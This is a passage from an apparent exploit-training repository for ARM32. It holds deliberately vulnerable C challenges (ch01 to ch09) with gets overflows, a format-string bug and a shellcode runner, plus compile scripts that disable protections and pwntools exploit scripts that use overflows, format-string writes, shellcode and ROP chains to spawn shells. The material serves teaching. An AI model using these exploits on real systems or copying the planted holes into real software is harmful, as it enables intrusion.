return 1; 48 | } 49 | else if (strcmp(buffer, "exit\n") == 0){ 50 | return 0; 51 | } 52 | else{ 53 | printf("Unknown command: %s", buffer); 54 | return 1; 55 | } 56 | 57 | } 58 | 59 | int main(int argc, char **argv){ 60 | setbuf(stdout, NULL); 61 | uid_t uid = geteuid(); 62 | setresuid(uid,uid,uid); 63 | printf("Welcome to ch01!\n"); 64 | while(1){ 65 | if (!(menu())){ 66 | break; 67 | } 68 | printf("\n"); 69 | } 70 | printf("Exiting...\n"); 71 | } 72 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch01/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch01.c -static -no-pie -o $1/ch01 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch01/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch01' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | r.recvuntil('exit - close program') 22 | send(r, msg_name='angel', msg_content=cyclic(50) + 'true') 23 | r.recvuntil('zenysec') 24 | flag = 'zenysec' + r.recvuntil('\n') 25 | log.success('The flag is: {flag}'.format(flag=flag)) 26 | r.close() 27 | 28 | 29 | if __name__ == '__main__': 30 | parser = argparse.ArgumentParser(description='Exploit ch01') 31 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 32 | main(**vars(parser.parse_args())) 33 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch01/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch02/ch02: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch02/ch02 -------------------------------------------------------------------------------- /writeups/arm32v7/ch02/ch02.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | void (*hook)(); 17 | }; 18 | struct locals l = {.name = {0}, .content = {0}, .hook = 0}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | 28 | if(l.hook){ 29 | l.hook(); 30 | } 31 | } 32 | 33 | int menu(){ 34 | char buffer[BUF_SIZE] = {0}; 35 | 36 | printf("[*] menu\n"); 37 | printf("menu - show this menu\n"); 38 | printf("send - send new message\n"); 39 | printf("exit - close program\n"); 40 | 41 | fgets(buffer, BUF_SIZE, stdin); 42 | 43 | if (strcmp(buffer, "menu\n") == 0){ 44 | return 1; 45 | } 46 | else if (strcmp(buffer, "send\n") == 0){ 47 | send(); 48 | return 1; 49 | } 50 | else if (strcmp(buffer, "exit\n") == 0){ 51 | return 0; 52 | } 53 | else{ 54 | printf("Unknown command: %s", buffer); 55 | return 1; 56 | } 57 | 58 | } 59 | 60 | int main(int argc, char **argv){ 61 | setbuf(stdout, NULL); 62 | uid_t uid = geteuid(); 63 | setresuid(uid,uid,uid); 64 | printf("Welcome to ch02!\n"); 65 | while(1){ 66 | if (!(menu())){ 67 | break; 68 | } 69 | printf("\n"); 70 | } 71 | printf("Exiting...\n"); 72 | } 73 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch02/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch02.c -static -no-pie -o $1/ch02 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch02/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch02' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | secret_func_addr = ELF(challenge_name).functions['secret'].address 22 | print hex(secret_func_addr) 23 | r.recvuntil('exit - close program') 24 | send(r, msg_name='angel', msg_content=cyclic(50) + pack(secret_func_addr, word_size=32)) 25 | r.recvuntil('zenysec') 26 | flag = 'zenysec' + r.recvuntil('\n') 27 | log.success('The flag is: {flag}'.format(flag=flag)) 28 | r.close() 29 | 30 | 31 | if __name__ == '__main__': 32 | parser = argparse.ArgumentParser(description='Exploit ch02') 33 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 34 | main(**vars(parser.parse_args())) 35 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch02/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch03/ch03: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch03/ch03 -------------------------------------------------------------------------------- /writeups/arm32v7/ch03/ch03.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | char command_string[BUF_SIZE] = "whoami\x00"; 9 | 10 | void secret02(){ 11 | strcpy(command_string, "cat flag\x00"); 12 | printf("secret02 called!\n"); 13 | } 14 | 15 | void secret01(){ 16 | system(command_string); 17 | printf("secret01 called!\n"); 18 | } 19 | 20 | void send(){ 21 | char name[BUF_SIZE] = {0}; 22 | char content[BUF_SIZE] = {0}; 23 | 24 | printf("Creating message\n"); 25 | printf("Enter message name:"); 26 | fgets(name, BUF_SIZE, stdin); 27 | printf("Enter message content:"); 28 | gets(content); 29 | 30 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 31 | } 32 | 33 | int menu(){ 34 | char buffer[BUF_SIZE] = {0}; 35 | 36 | printf("[*] menu\n"); 37 | printf("menu - show this menu\n"); 38 | printf("send - send new message\n"); 39 | printf("exit - close program\n"); 40 | 41 | fgets(buffer, BUF_SIZE, stdin); 42 | 43 | if (strcmp(buffer, "menu\n") == 0){ 44 | return 1; 45 | } 46 | else if (strcmp(buffer, "send\n") == 0){ 47 | send(); 48 | return 1; 49 | } 50 | else if (strcmp(buffer, "exit\n") == 0){ 51 | return 0; 52 | } 53 | else{ 54 | printf("Unknown command: %s", buffer); 55 | return 1; 56 | } 57 | 58 | } 59 | 60 | int main(int argc, char **argv){ 61 | setbuf(stdout, NULL); 62 | uid_t uid = geteuid(); 63 | setresuid(uid,uid,uid); 64 | printf("Welcome to ch03!\n"); 65 | while(1){ 66 | if (!(menu())){ 67 | break; 68 | } 69 | printf("\n"); 70 | } 71 | printf("Exiting...\n"); 72 | } 73 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch03/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch03.c -static -fno-stack-protector -no-pie -o $1/ch03 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch03/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch03' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | functions = ELF(challenge_name).functions 22 | secret01_func_addr = functions['secret01'].address 23 | secret02_func_addr = functions['secret02'].address + 2 # skip push {r7, lr} 24 | 25 | r.recvuntil('exit - close program') 26 | send(r, msg_name='angel', 27 | msg_content=cyclic(108) + pack(secret02_func_addr, word_size=32) + 'a' * 4 + pack(secret01_func_addr, 28 | word_size=32)) 29 | r.recvuntil('zenysec') 30 | flag = 'zenysec' + r.recvuntil('\n') 31 | log.success('The flag is: {flag}'.format(flag=flag)) 32 | r.close() 33 | 34 | 35 | if __name__ == '__main__': 36 | parser = argparse.ArgumentParser(description='Exploit ch03') 37 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 38 | main(**vars(parser.parse_args())) 39 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch03/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch04/ch04: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch04/ch04 -------------------------------------------------------------------------------- /writeups/arm32v7/ch04/ch04.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | char content[BUF_SIZE*2] = "dummy"; 9 | char perm[BUF_SIZE*2] = "user"; 10 | 11 | void secret(){ 12 | system("cat flag"); 13 | } 14 | 15 | void send(){ 16 | char name[BUF_SIZE] = {0}; 17 | printf("Creating message\n"); 18 | printf("Enter message name:"); 19 | fgets(name, BUF_SIZE*2, stdin); 20 | printf("Enter message content:"); 21 | gets(content); 22 | 23 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 24 | if(strcmp(perm, "root") == 0){ 25 | secret(); 26 | } 27 | } 28 | 29 | int menu(){ 30 | char buffer[BUF_SIZE] = {0}; 31 | 32 | printf("[*] menu\n"); 33 | printf("menu - show this menu\n"); 34 | printf("send - send new message\n"); 35 | printf("exit - close program\n"); 36 | 37 | fgets(buffer, BUF_SIZE, stdin); 38 | 39 | if (strcmp(buffer, "menu\n") == 0){ 40 | return 1; 41 | } 42 | else if (strcmp(buffer, "send\n") == 0){ 43 | send(); 44 | return 1; 45 | } 46 | else if (strcmp(buffer, "exit\n") == 0){ 47 | return 0; 48 | } 49 | else{ 50 | printf("Unknown command: %s", buffer); 51 | return 1; 52 | } 53 | 54 | } 55 | 56 | int main(int argc, char **argv){ 57 | setbuf(stdout, NULL); 58 | uid_t uid = geteuid(); 59 | setresuid(uid,uid,uid); 60 | printf("Welcome to ch04!\n"); 61 | while(1){ 62 | if (!(menu())){ 63 | break; 64 | } 65 | printf("\n"); 66 | } 67 | printf("Exiting...\n"); 68 | } 69 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch04/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch04.c -static -no-pie -o $1/ch04 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch04/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch04' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | r.recvuntil('exit - close program') 22 | send(r, msg_name='angel', msg_content=cyclic(100) + 'root') 23 | r.recvuntil('zenysec') 24 | flag = 'zenysec' + r.recvuntil('\n') 25 | log.success('The flag is: {flag}'.format(flag=flag)) 26 | r.close() 27 | 28 | 29 | if __name__ == '__main__': 30 | parser = argparse.ArgumentParser(description='Exploit ch04') 31 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 32 | main(**vars(parser.parse_args())) 33 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch04/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch05/ch05: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch05/ch05 -------------------------------------------------------------------------------- /writeups/arm32v7/ch05/ch05.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | char name[BUF_SIZE*2] = {0}; 14 | char content[BUF_SIZE*2] = {0}; 15 | 16 | printf("Creating message\n"); 17 | printf("Enter message name:"); 18 | fgets(name, BUF_SIZE*2, stdin); 19 | printf("Enter message content:"); 20 | fgets(content, BUF_SIZE*2, stdin); 21 | 22 | printf("name: \"%s\"\ncontent:\"", name); 23 | printf(content); 24 | printf("\"\n"); 25 | } 26 | 27 | int menu(){ 28 | char buffer[BUF_SIZE] = {0}; 29 | 30 | printf("[*] menu\n"); 31 | printf("menu - show this menu\n"); 32 | printf("send - send new message\n"); 33 | printf("exit - close program\n"); 34 | 35 | fgets(buffer, BUF_SIZE, stdin); 36 | 37 | if (strcmp(buffer, "menu\n") == 0){ 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "send\n") == 0){ 41 | send(); 42 | return 1; 43 | } 44 | else if (strcmp(buffer, "exit\n") == 0){ 45 | return 0; 46 | } 47 | else{ 48 | printf("Unknown command: %s", buffer); 49 | return 1; 50 | } 51 | 52 | } 53 | 54 | int main(int argc, char **argv){ 55 | setbuf(stdout, NULL); 56 | uid_t uid = geteuid(); 57 | setresuid(uid,uid,uid); 58 | printf("Welcome to ch05!\n"); 59 | while(1){ 60 | if (!(menu())){ 61 | break; 62 | } 63 | printf("\n"); 64 | } 65 | printf("Exiting...\n"); 66 | exit(1); 67 | } 68 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch05/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch05.c -static -no-pie -o $1/ch05 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch05/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch05' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | secret_func_addr = ELF(challenge_name).functions['secret'].address 22 | 23 | leak_offset = 56 24 | r.recvuntil('exit - close program') 25 | send(r, msg_name='angel', 26 | msg_content='%{leak_offset}$x'.format(leak_offset=leak_offset)) 27 | r.recvuntil('content:\"') 28 | stack_return = int(r.recvuntil('\n').strip(), 16) - 4 29 | log.info("stack return: {stack_return}".format(stack_return=hex(stack_return))) 30 | r.recvuntil('exit - close program') 31 | 32 | r1 = (secret_func_addr & 0xffff) - 0x8 33 | r2 = ((secret_func_addr >> 16) - r1 - 1) & 0xffff - 8 34 | content_offset01 = 30 35 | content_offset02 = 31 36 | 37 | # Option A 38 | send(r, msg_name='angel', 39 | msg_content='{ret01}{ret02}%{padding01}x%{content_offset01}$hnn%{padding02}x%{content_offset02}$hnn'.format( 40 | ret01=pack(stack_return, word_size=32), 41 | ret02=pack(stack_return + 2, word_size=32), 42 | content_offset01=content_offset01, 43 | content_offset02=content_offset02, 44 | padding01=r1, 45 | padding02=r2)) 46 | 47 | # Option B 48 | # send(r, msg_name='angel', 49 | # msg_content='{ret01}{ret02}%{padding01}x%{content_offset01}$hnn'.format( 50 | # ret01=pack(stack_return, word_size=32), 51 | # ret02=pack(stack_return + 2, word_size=32), 52 | # content_offset01=content_offset01, 53 | # padding01=r1)) 54 | 55 | r.recvuntil('zenysec') 56 | flag = 'zenysec' + r.recvuntil('\n') 57 | log.success('The flag is: {flag}'.format(flag=flag)) 58 | r.close() 59 | 60 | 61 | if __name__ == '__main__': 62 | parser = argparse.ArgumentParser(description='Exploit ch05') 63 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 64 | main(**vars(parser.parse_args())) 65 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch05/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch06/ch06: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch06/ch06 -------------------------------------------------------------------------------- /writeups/arm32v7/ch06/ch06.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | #define BUF_SIZE 50 9 | #define PAGE_SIZE 4096 10 | 11 | void runner(){ 12 | char content[PAGE_SIZE]; 13 | char *code; 14 | 15 | printf("Enter byte to run:"); 16 | fgets(content, PAGE_SIZE, stdin); 17 | 18 | code = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); 19 | memcpy(code, content, PAGE_SIZE); 20 | 21 | mprotect(code, PAGE_SIZE, PROT_READ|PROT_EXEC); 22 | 23 | void (*func)() = (void (*)())code; 24 | func(); 25 | 26 | munmap(code, PAGE_SIZE); 27 | } 28 | 29 | void send(){ 30 | char name[BUF_SIZE] = {0}; 31 | char content[BUF_SIZE] = {0}; 32 | 33 | printf("Creating message\n"); 34 | printf("Enter message name:"); 35 | fgets(name, BUF_SIZE, stdin); 36 | printf("Enter message content:"); 37 | fgets(content, BUF_SIZE, stdin); 38 | 39 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 40 | } 41 | 42 | int menu(){ 43 | char buffer[BUF_SIZE] = {0}; 44 | 45 | printf("[*] menu\n"); 46 | printf("menu - show this menu\n"); 47 | printf("send - send new message\n"); 48 | printf("runner - run bytes\n"); 49 | printf("exit - close program\n"); 50 | 51 | fgets(buffer, BUF_SIZE, stdin); 52 | 53 | if (strcmp(buffer, "menu\n") == 0){ 54 | return 1; 55 | } 56 | else if (strcmp(buffer, "send\n") == 0){ 57 | send(); 58 | return 1; 59 | } 60 | else if (strcmp(buffer, "runner\n") == 0){ 61 | runner(); 62 | return 1; 63 | } 64 | else if (strcmp(buffer, "exit\n") == 0){ 65 | return 0; 66 | } 67 | else{ 68 | printf("Unknown command: %s", buffer); 69 | return 1; 70 | } 71 | 72 | } 73 | 74 | int main(int argc, char **argv){ 75 | setbuf(stdout, NULL); 76 | uid_t uid = geteuid(); 77 | setresuid(uid,uid,uid); 78 | printf("Welcome to ch06!\n"); 79 | while(1){ 80 | if (!(menu())){ 81 | break; 82 | } 83 | printf("\n"); 84 | } 85 | printf("Exiting...\n"); 86 | } 87 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch06/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch06.c -static -no-pie -o $1/ch06 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch06/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | context.clear(arch='arm') 8 | 9 | 10 | def runner(r, payload): 11 | r.sendline('runner') 12 | r.recvuntil('Enter byte to run:') 13 | r.sendline(payload) 14 | 15 | 16 | def send(r, msg_name, msg_content): 17 | r.sendline('send') 18 | r.recvuntil('Enter message name:') 19 | r.sendline(msg_name) 20 | r.recvuntil('Enter message content:') 21 | r.sendline(msg_content) 22 | 23 | 24 | def main(execution): 25 | challenge_name = 'ch06' 26 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 27 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 28 | 29 | # Option 1 30 | shell_code = asm(shellcraft.arm.linux.sh()) 31 | 32 | r.recvuntil('exit - close program') 33 | runner(r, payload=shell_code) 34 | 35 | r.sendline('cat flag') 36 | r.recvuntil('zenysec') 37 | flag = 'zenysec' + r.recvuntil('\n') 38 | log.success('The flag is: {flag}'.format(flag=flag)) 39 | r.close() 40 | 41 | 42 | if __name__ == '__main__': 43 | parser = argparse.ArgumentParser(description='Exploit ch06') 44 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 45 | main(**vars(parser.parse_args())) 46 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch06/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch07/ch07: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch07/ch07 -------------------------------------------------------------------------------- /writeups/arm32v7/ch07/ch07.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | char command_string[BUF_SIZE] = "cat flag\x00"; 9 | 10 | void func(){ 11 | system("whoami"); 12 | } 13 | 14 | void gadget(){ 15 | __asm__("pop {r0,pc}\n"); 16 | } 17 | 18 | void send(){ 19 | char name[BUF_SIZE] = {0}; 20 | char content[BUF_SIZE] = {0}; 21 | 22 | printf("Creating message\n"); 23 | printf("Enter message name:"); 24 | fgets(name, BUF_SIZE, stdin); 25 | printf("Enter message content:"); 26 | gets(content); 27 | 28 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 29 | } 30 | 31 | int menu(){ 32 | char buffer[BUF_SIZE] = {0}; 33 | 34 | printf("[*] menu\n"); 35 | printf("menu - show this menu\n"); 36 | printf("send - send new message\n"); 37 | printf("exit - close program\n"); 38 | 39 | fgets(buffer, BUF_SIZE, stdin); 40 | 41 | if (strcmp(buffer, "menu\n") == 0){ 42 | return 1; 43 | } 44 | else if (strcmp(buffer, "send\n") == 0){ 45 | send(); 46 | return 1; 47 | } 48 | else if (strcmp(buffer, "exit\n") == 0){ 49 | return 0; 50 | } 51 | else{ 52 | printf("Unknown command: %s", buffer); 53 | return 1; 54 | } 55 | 56 | } 57 | 58 | int main(int argc, char **argv){ 59 | setbuf(stdout, NULL); 60 | uid_t uid = geteuid(); 61 | setresuid(uid,uid,uid); 62 | printf("Welcome to ch07!\n"); 63 | while(1){ 64 | if (!(menu())){ 65 | break; 66 | } 67 | printf("\n"); 68 | } 69 | printf("Exiting...\n"); 70 | } 71 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch07/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch07.c -static -fno-stack-protector -no-pie -o $1/ch07 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch07/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch07' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | e = ELF(challenge_name) 22 | functions = e.functions 23 | symbols = e.symbols 24 | gadget_func_addr = functions['gadget'].address + 4 # pop {r0, pc} 25 | 26 | func_func_addr = functions['func'].address + 12 # bl 0x14cbc 27 | 28 | command_string_addr = symbols['command_string'] # "cat flag" 29 | 30 | r.recvuntil('exit - close program') 31 | send(r, msg_name='angel', 32 | msg_content=cyclic(108) + pack(gadget_func_addr, 32) + pack(command_string_addr, 32) + pack(func_func_addr, 33 | 32)) 34 | r.recvuntil('zenysec') 35 | flag = 'zenysec' + r.recvuntil('\n') 36 | log.success('The flag is: {flag}'.format(flag=flag)) 37 | r.close() 38 | 39 | 40 | if __name__ == '__main__': 41 | parser = argparse.ArgumentParser(description='Exploit ch07') 42 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 43 | main(**vars(parser.parse_args())) 44 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch07/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch08/ch08: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch08/ch08 -------------------------------------------------------------------------------- /writeups/arm32v7/ch08/ch08.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void func(){ 9 | system("whoami"); 10 | } 11 | 12 | void send(){ 13 | char name[BUF_SIZE] = {0}; 14 | char content[BUF_SIZE] = {0}; 15 | 16 | printf("Creating message\n"); 17 | printf("Enter message name:"); 18 | fgets(name, BUF_SIZE, stdin); 19 | printf("Enter message content:"); 20 | gets(content); 21 | 22 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 23 | } 24 | 25 | int menu(){ 26 | char buffer[BUF_SIZE] = {0}; 27 | 28 | printf("[*] menu\n"); 29 | printf("menu - show this menu\n"); 30 | printf("send - send new message\n"); 31 | printf("exit - close program\n"); 32 | 33 | fgets(buffer, BUF_SIZE, stdin); 34 | 35 | if (strcmp(buffer, "menu\n") == 0){ 36 | return 1; 37 | } 38 | else if (strcmp(buffer, "send\n") == 0){ 39 | send(); 40 | return 1; 41 | } 42 | else if (strcmp(buffer, "exit\n") == 0){ 43 | return 0; 44 | } 45 | else{ 46 | printf("Unknown command: %s", buffer); 47 | return 1; 48 | } 49 | 50 | } 51 | 52 | int main(int argc, char **argv){ 53 | setbuf(stdout, NULL); 54 | uid_t uid = geteuid(); 55 | setresuid(uid,uid,uid); 56 | printf("Welcome to ch08!\n"); 57 | while(1){ 58 | if (!(menu())){ 59 | break; 60 | } 61 | printf("\n"); 62 | } 63 | printf("Exiting...\n"); 64 | } 65 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch08/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch08.c -static -fno-stack-protector -no-pie -o $1/ch08 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch08/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | context.clear(arch='arm') 8 | 9 | 10 | def send(r, msg_name, msg_content): 11 | r.sendline('send') 12 | r.recvuntil('Enter message name:') 13 | r.sendline(msg_name) 14 | r.recvuntil('Enter message content:') 15 | r.sendline(msg_content) 16 | 17 | 18 | def main(execution): 19 | challenge_name = 'ch08' 20 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 21 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 22 | 23 | e = ELF(challenge_name) 24 | functions = e.functions 25 | 26 | gadget_func_addr = next(e.search(asm('pop {r0, r4, pc}'))) # 0x0001f9ec 27 | 28 | func_system_addr = functions['system'].address 29 | 30 | command_string_addr = next(e.search('/bin/sh')) 31 | 32 | r.recvuntil('exit - close program') 33 | send(r, msg_name='angel', 34 | msg_content=cyclic(108) + pack(gadget_func_addr, 32) + pack(command_string_addr, 32) + 'aaaa' + pack( 35 | func_system_addr, 36 | 32)) 37 | 38 | r.sendline('cat flag') 39 | r.recvuntil('zenysec') 40 | flag = 'zenysec' + r.recvuntil('\n') 41 | log.success('The flag is: {flag}'.format(flag=flag)) 42 | r.close() 43 | 44 | 45 | if __name__ == '__main__': 46 | parser = argparse.ArgumentParser(description='Exploit ch08') 47 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 48 | main(**vars(parser.parse_args())) 49 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch08/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch09/ch09: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch09/ch09 -------------------------------------------------------------------------------- /writeups/arm32v7/ch09/ch09.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | int admin = 0; 9 | char command_string[BUF_SIZE] = "whoami\x00"; 10 | 11 | void write_anywhere(){ 12 | __asm__("str r0, [r1]"); 13 | printf("write_anywhere!\n"); 14 | } 15 | 16 | void gadget(){ 17 | __asm__("pop {r0,r1,pc}"); 18 | } 19 | 20 | void authenticate(){ 21 | uid_t 